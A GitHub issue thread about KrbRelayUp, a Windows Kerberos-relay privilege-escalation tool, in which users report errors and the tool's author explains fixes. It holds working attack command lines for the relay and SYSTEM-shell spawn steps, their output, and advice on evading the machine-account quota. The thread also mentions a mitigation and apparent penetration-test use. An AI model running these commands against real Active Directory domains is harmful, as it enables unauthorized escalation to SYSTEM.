Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Could not find computer account SID: #3

Open
dreizehnutters opened this issue Apr 27, 2022 · 11 comments
Open

Could not find computer account SID: #3

dreizehnutters opened this issue Apr 27, 2022 · 11 comments

Comments

@dreizehnutters
Copy link

Hey,

I just tried the POC for a costumer. Unfortunately the method does not seem to work on the Windows 10 Enterprise 19042 Client.
LDAP signing is disabled

KrbRelayUp_fail
@0xBrAinsTorM
Copy link

Are you sure you used the FQDN for -Domain? I get this error if the Domain is not correct (i.e. using windomain when it should be windomain.local)

@PyroChiliarch
Copy link

I had this issue, started working after a reboot.

@qiminghe
Copy link

qiminghe commented May 2, 2022

same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works:
KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[+] Computer account "evilhost$" added with password "pass0123"
[-] Could not find computer account SID:
[-] Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index
KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Help?

@Dec0ne
Copy link
Owner

Dec0ne commented May 2, 2022

same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works: KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [+] Computer account "evilhost$" added with password "pass0123" [-] Could not find computer account SID: [-] Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: index KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [-] Could not add new computer account: [-] The user has insufficient access rights. Help?

In the first command your domain was incorrect so it couldn't find the SID of the new computer in that domain (cause it doesn't exist) so this why it failed.
In the second command the domain flag was correct but it couldn't add the "evilhost$" computer because it's already exist (it was added in the first command).
Try either remove the -CreateNewComputerAccount from the second command or specify a new -computerName:

  • KrbRelayUp.exe relay -d mycompany.com -ComputerName evilhost$ -ComputerPassword pass0123
  • KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost222$ -ComputerPassword pass0123

In the next version (should be out this week) the tool will lookup the domain by itself so this kind of confusion would be less likely to happen again.

@qiminghe
Copy link

qiminghe commented May 2, 2022

Tried two revisions, getting the same error:
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Do I have to be Win local admin (run as admin) for the command? Tried that, does not help either
Any debug/log option I can turn on for troubleshooting? Regarding domain lookup, is it just:
PS>systeminfo | Select-String 'Domain'
which I used here.

@qiminghe
Copy link

qiminghe commented May 4, 2022

I pulled out the latest and re-run the excutable and notice following option dispearing
-c (--CreateNewComputerAccount)
Assuming I am running the executable from existing laptop123 I own:
.\KrbRelayUp.exe relay -d mycompany.com -cn laptop123$ -cp pass0123
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp spawn -d mycompany.com -cn laptop123$ -cp pass0123
However, when running the last suggested command, I am getting following error:
KrbRelayUp - Relaying you to SYSTEM
[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Do I have to do anything about laptop's firewall? I can verify AD server port 389/88 are all open. Anything else I need to check?

@Dec0ne
Copy link
Owner

Dec0ne commented May 4, 2022

[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED means that the password specified for the laptop123$ machine account is incorrect.

the -cn and -cp flags are for the separate machine account you own or the one you added if you specified -c to create a new one (not the one you are executing KrbRelayUp from)

run those 2 commands and it should work:

  • .\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
  • .\KrbRelayUp.exe spawn -d mycompany.com -cn newcomputer$ -cp newpass0123

@qiminghe
Copy link

qiminghe commented May 4, 2022

when running the following command to createnewcomputeraccount (-c)
\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
I fall back to old error below (still not sure what causing problem without debug/logs)
KrbRelayUp - Relaying you to SYSTEM
[-] Could not add new computer account:
[-] The user has insufficient access rights.

@Dec0ne
Copy link
Owner

Dec0ne commented May 5, 2022

Insufficient privileges to add a computer account usually is due to either a restriction in the domain where regular users are not allowed to add a new machine accout (this is actually one of the mitigation suggestions for this attack) or because your user have reached the maximum quota for new computer accounts it may add which is 10 by default (this is my guess for your specific issue).
You can either delete via domain admin from the DC all of the computer accounts you've added and that will reset your user's quata so you can perform the attack again or use another domain user to perform the attack with.

@qiminghe
Copy link

qiminghe commented May 5, 2022

I verified:

  1. AD ldap:// is bind-able to 389, assuming LDAP signing is NOT enforced(deafult).
  2. query for 'ms-DS-MachineAccountQuota' which is 10(default) as follows:
    PS>Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
    DistinguishedName : DC=xxx,DC=xxx,DC=xxx,DC=xxx
    ms-DS-MachineAccountQuota : 10
    Name : corp
    ObjectClass : domainDNS
    ObjectGUID : xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
    How do I query AD to see if I have reached my quota? I have seen following error 10+ times though:
    [+]Computer account "evilhost$" added with password xxxx
    [-]Could not find computer account SID:
    Does this mean 'evilhost' are successfully added? If so, how to AD-query for it?
    The window machine running the script has Full DN as: CN=laptop123,OU=xxx,OU=xxx,DC=xxx,DC=xxx,DC=xxx,DC=xxx
    Do I have to provide KrbRelayUp with full DN? like -cn CN=evilhost,OU=xxx,....? Please advise. Thx

@Dec0ne
Copy link
Owner

Dec0ne commented May 6, 2022

Could you check the previous commands using new low priv user? (which probably still hadn't reached it's ms-DS-MachineAccountQuota limit)
Other route you could take is login in to your DC using a domain admin and manually deleting all of the machine accounts added by the previous KrbRelayUp runs, this will let your user add new machine accounts again.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@qiminghe @dreizehnutters @PyroChiliarch @0xBrAinsTorM @Dec0ne